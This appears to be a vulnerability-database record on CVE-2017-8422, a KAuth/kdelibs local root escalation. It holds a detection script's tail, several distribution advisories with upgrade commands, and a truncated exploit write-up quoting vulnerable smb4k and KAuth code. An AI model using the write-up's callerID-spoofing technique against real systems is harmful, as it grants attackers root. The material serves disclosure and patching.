isdpkgvuln(pkg:\"kdelibs-bin\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"kdelibs5-data\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"kdelibs5-dbg\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"kdelibs5-dev\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"kdelibs5-plugins\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"kdoctools\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkcmutils4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkde3support4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkdeclarative5\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkdecore5\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkdesu5\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkdeui5\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkdewebkit5\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkdnssd4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkemoticons4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkfile4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkhtml5\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkidletime4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkimproxy4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkio5\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkjsapi4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkjsembed4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkmediaplayer4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libknewstuff2-4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libknewstuff3-4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libknotifyconfig4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkntlm4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkparts4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkprintutils4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkpty4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkrosscore4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkrossui4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libktexteditor4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkunitconversion4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libkutils4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libnepomuk4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libnepomukquery4a\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libnepomukutils4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libplasma3\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsolid4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libthreadweaver4\", ver:\"4:4.8.4-4+deb7u3\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Sebastian Krahmer from SUSE discovered that the KAuth framework contains a logic flaw in which the service invoking dbus is not properly checked. This flaw allows spoofing the identity of the caller and gaining root privileges from an unprivileged account (CVE-2017-8422). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-16T22:32:05", "type": "mageia", "title": "Updated kauth and kdelibs4 packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-08-16T22:32:05", "id": "MGASA-2017-0274", "href": "https://advisories.mageia.org/MGASA-2017-0274.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2021-06-08T18:42:50", "description": "This update for kauth and kdelibs4 fixes the following issues:\n\n - CVE-2017-8422: logic flaw in the KAuth framework allowed privilege\n escalation (boo#1036244).\n\n", "cvss3": {}, "published": "2017-05-15T18:22:43", "type": "suse", "title": "Security update for kauth, kdelibs4 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-15T18:22:43", "id": "OPENSUSE-SU-2017:1272-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00025.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-18T17:20:40", "description": "This update for kdelibs4 fixes the following issues:\n\n - CVE-2017-8422: This update fixes problem in the DBUS authentication of\n the kauth framework that could be used to escalate privileges depending\n on bugs or misimplemented dbus services. (boo#1036244)\n\n", "cvss3": {}, "published": "2017-05-18T18:23:43", "type": "suse", "title": "Security update for kdelibs4 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-18T18:23:43", "id": "SUSE-SU-2017:1335-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00055.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:42:49", "description": "This update for kauth and kdelibs4 fixes the following issues:\n\n - CVE-2017-8422: logic flaw in the KAuth framework allowed privilege\n escalation (boo#1036244).\n\n", "cvss3": {}, "published": "2017-05-15T18:10:49", "type": "suse", "title": "Security update for kauth, kdelibs4 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-15T18:10:49", "id": "OPENSUSE-SU-2017:1254-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00024.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "centos": [{"lastseen": "2022-02-27T11:51:41", "description": "**CentOS Errata and Security Advisory** CESA-2017:1264\n\n\nThe K Desktop Environment (KDE) is a graphical desktop environment for the X Window System. The kdelibs packages include core libraries for the K Desktop Environment.\n\nSecurity Fix(es):\n\n* A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2017-May/059332.html\n\n**Affected packages:**\nkdelibs\nkdelibs-apidocs\nkdelibs-common\nkdelibs-devel\nkdelibs-ktexteditor\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2017:1264", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-22T16:27:46", "type": "centos", "title": "kdelibs security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-22T16:27:46", "id": "CESA-2017:1264", "href": "https://lists.centos.org/pipermail/centos-announce/2017-May/059332.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T12:13:06", "description": "Sebastian Krahmer discovered that the KDE-Libs Kauth component incorrectly \nchecked services invoking D-Bus. A local attacker could use this issue to \ngain root privileges.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-15T00:00:00", "type": "ubuntu", "title": "KDE-Libs vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-15T00:00:00", "id": "USN-3286-1", "href": "https://ubuntu.com/security/notices/USN-3286-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:36:32", "description": "KDE kdelibs before 4.14.32 and KAuth before 5.34 allow local users to gain\nroot privileges by spoofing a callerID and leveraging a privileged helper\napp.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/kauth/+bug/1689759>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-10T00:00:00", "type": "ubuntucve", "title": "CVE-2017-8422", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-10T00:00:00", "id": "UB:CVE-2017-8422", "href": "https://ubuntu.com/security/CVE-2017-8422", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:09", "description": "Arch Linux Security Advisory ASA-201705-13\n==========================================\n\nSeverity: High\nDate : 2017-05-10\nCVE-ID : CVE-2017-8422\nPackage : kdelibs\nType : privilege escalation\nRemote : No\nLink : https://security.archlinux.org/AVG-270\n\nSummary\n=======\n\nThe package kdelibs before version 4.14.32-1 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 4.14.32-1.\n\n# pacman -Syu \"kdelibs>=4.14.32-1\"\n\nThe problem has been fixed upstream in version 4.14.32.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nKAuth <= 5.33.0 contains a logic flaw in which the service invoking\ndbus is not properly checked. This allows spoofing the identity of the\ncaller and with some carefully crafted calls can lead to gaining root\nfrom an unprivileged account.\n\nImpact\n======\n\nA local, unprivileged attacker can escalate privileges to become root\non the affected host.\n\nReferences\n==========\n\nhttps://commits.kde.org/kdelibs/264e97625abe2e0334f97de17f6ffb52582888ab\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\nhttp://seclists.org/oss-sec/2017/q2/240\nhttps://commits.kde.org/kauth/df875f725293af53399f5146362eb158b4f9216a\nhttps://security.archlinux.org/CVE-2017-8422", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-10T00:00:00", "type": "archlinux", "title": "[ASA-201705-13] kdelibs: privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-10T00:00:00", "id": "ASA-201705-13", "href": "https://security.archlinux.org/ASA-201705-13", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:09", "description": "Arch Linux Security Advisory ASA-201705-12\n==========================================\n\nSeverity: High\nDate : 2017-05-10\nCVE-ID : CVE-2017-8422\nPackage : kauth\nType : privilege escalation\nRemote : No\nLink : https://security.archlinux.org/AVG-269\n\nSummary\n=======\n\nThe package kauth before version 5.33.0-2 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 5.33.0-2.\n\n# pacman -Syu \"kauth>=5.33.0-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nKAuth <= 5.33.0 contains a logic flaw in which the service invoking\ndbus is not properly checked. This allows spoofing the identity of the\ncaller and with some carefully crafted calls can lead to gaining root\nfrom an unprivileged account.\n\nImpact\n======\n\nA local, unprivileged attacker can escalate privileges to become root\non the affected host.\n\nReferences\n==========\n\nhttps://cgit.kde.org/kauth.git/commit/?id=df875f725293af53399f5146362eb158b4f9216a\nhttps://www.kde.org/info/security/advisory-20170510-1.txt\nhttp://seclists.org/oss-sec/2017/q2/240\nhttps://commits.kde.org/kauth/df875f725293af53399f5146362eb158b4f9216a\nhttps://commits.kde.org/kdelibs/264e97625abe2e0334f97de17f6ffb52582888ab\nhttps://security.archlinux.org/CVE-2017-8422", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-10T00:00:00", "type": "archlinux", "title": "[ASA-201705-12] kauth: privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-10T00:00:00", "id": "ASA-201705-12", "href": "https://security.archlinux.org/ASA-201705-12", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-21T04:43:46", "description": "The K Desktop Environment (KDE) is a graphical desktop environment for the X Window System. The kdelibs packages include core libraries for the K Desktop Environment.\n\nSecurity Fix(es):\n\n* A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting this issue.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-22T07:36:42", "type": "redhat", "title": "(RHSA-2017:1264) Important: kdelibs security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2018-04-11T23:33:03", "id": "RHSA-2017:1264", "href": "https://access.redhat.com/errata/RHSA-2017:1264", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2021-07-28T14:24:51", "description": "[6:4.14.8-6]\n- KAuth: verify that whoever is calling us is actually who he says he is (CVE-2017-8422)\n Resolves: CVE-2017-8422", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-22T00:00:00", "type": "oraclelinux", "title": "kdelibs security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-22T00:00:00", "id": "ELSA-2017-1264", "href": "http://linux.oracle.com/errata/ELSA-2017-1264.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:05:58", "description": "### Background\n\nKAuth provides a convenient, system-integrated way to offload actions that need to be performed as a privileged user (root, for example) to small (hopefully secure) helper utilities. \n\nThe KDE libraries, basis of KDE and used by many open source projects.\n\n### Description\n\nKAuth and KDELibs contains a logic flaw in which the service invoking D-Bus is not properly checked. This allows spoofing the identity of the caller and with some carefully crafted calls can lead to gaining root from an unprivileged account. \n\n### Impact\n\nA local attacker could spoof the identity of the caller invoking D-Bus, possibly resulting in gaining privileges. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll KAuth users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=kde-frameworks/kauth-5.29.0-r1\"\n \n\nAll KDELibs users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=kde-frameworks/kdelibs-4.14.32\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-27T00:00:00", "type": "gentoo", "title": "KAuth and KDELibs: Privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-06-27T00:00:00", "id": "GLSA-201706-29", "href": "https://security.gentoo.org/glsa/201706-29", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T11:57:48", "description": "This document describes a generic root exploit against kde.\r\n\r\nThe exploit is achieved by abusing a logic flaw within the KAuth framework which is present in kde4 (org.kde.auth) and kde5 (org.kde.kf5auth). It is possible to spoof what KAuth calls callerID's which are indeed D-Bus unique names of the sender of a D-Bus message. Exploitation requires a helper which is doing some privileged work as root. Kde ships quite some of them, but for this writeup I chose the smb4k helper because it contains another vulnerability that makes exploitation a lot easier; but in general any KAuth privileged helper code can be triggered by users with arbitrary arguments which leads to LPE on default kde installations.\r\n\r\nI will describe the overall problem by walking through the smb4k code and explain which D-Bus functions are called and how a particular smb4k bug maps into the bigger picture of the KAuth flaw.\r\n\r\nTheres a problem with smb4k using the KAuth framework and trusting all the arguments passed to the helper:\r\n```\r\nActionReply Smb4KMountHelper::mount(const QVariantMap &args)\r\n{\r\n\r\n...\r\n\r\ncommand << args[\"mh_command\"].toString();\r\ncommand << args[\"mh_unc\"].toString();\r\ncommand << args[\"mh_mountpoint\"].toString();\r\ncommand << args[\"mh_options\"].toStringList();\r\n\r\n...\r\n\r\nproc.setProgram(command);\r\n// Run the mount process.\r\nproc.start();\r\n...\r\n}\r\n```\r\nThis code is running as root, triggered via D-Bus activation by smb4k GUI code running as user, and the args supplied by the user, via:\r\n```\r\nvoid Smb4KMountJob::slotStartMount()\r\n{\r\n...\r\n\r\n Action::executeActions(actions, NULL, \"net.sourceforge.smb4k.mounthelper\");\r\n...\r\n}\r\n```\r\nafter filling actions (theres only one) with the proper Name net.sourceforge.smb4k.mounthelper.mount and HelperID net.sourceforge.smb4k.mounthelper in order to trigger D-Bus activation as well as the argument dictionary which contains the mh_command etc. key/value pairs. Its calling the list-version of Action::executeAction() [note the trailing 's'] with a one-element list, but that doesn't matter. The important thing here is that the arguments are created by code running as user - potentially containing evil input - and are evaluated by the helper program running as root.\r\n\r\nThe above call ends at DBusHelperProxy::executeAction(), still at callers side. This function translates it into a D-Bus method call which is finally running privileged and has the following interface:\r\n```\r\n<interface name=\"org.kde.kf5auth\">\r\n...\r\n <method name=\"performAction\" >\r\n <arg name=\"action\" type=\"s\" direction=\"in\" />\r\n <arg name=\"callerID\" type=\"ay\" direction=\"in\" />\r\n <arg name=\"arguments\" type=\"ay\" direction=\"in\" />\r\n <arg name=\"r\" type=\"ay\" direction=\"out\" />\r\n </method>\r\n...\r\n</interface>\r\n```\r\n\r\nUnlike the root helpers D-Bus interfaces itself, which are not accessible as user, the KAuth D-Bus interface org.kde.kf5auth is:\r\n```\r\n<busconfig>\r\n <policy context=\"default\">\r\n <allow send_interface=\"org.kde.kf5auth\"/>\r\n <allow receive_sender=\"org.kde.kf5auth\"/>\r\n <allow receive_interface=\"org.kde.kf5auth\"/>\r\n </policy>\r\n</busconfig>\r\n```\r\nThe code for actually doing the call from user to root is this:\r\n```\r\nvoid DBusHelperProxy::executeAction(const QString &action,\r\n const QString &helperID, const QVariantMap &arguments)\r\n{\r\n...\r\n\r\nQDBusMessage::createMethodCall(helperID, QLatin1String(\"/\"),\r\n QLatin1String(\"org.kde.kf5auth\"), QLatin1String(\"performAction\"));\r\n\r\nQList<QVariant> args;\r\nargs << action << BackendsManager::authBackend()->callerID() << blob;\r\nmessage.setArguments(args);\r\n\r\nm_actionsInProgress.push_back(action);\r\n\r\nQDBusPendingCall pendingCall = m_busConnection.asyncCall(message);\r\n\r\n...\r\n}\r\n```\r\nThis code is invoking the performAction() D-Bus method, passing along the user supplied arguments dictionary, in 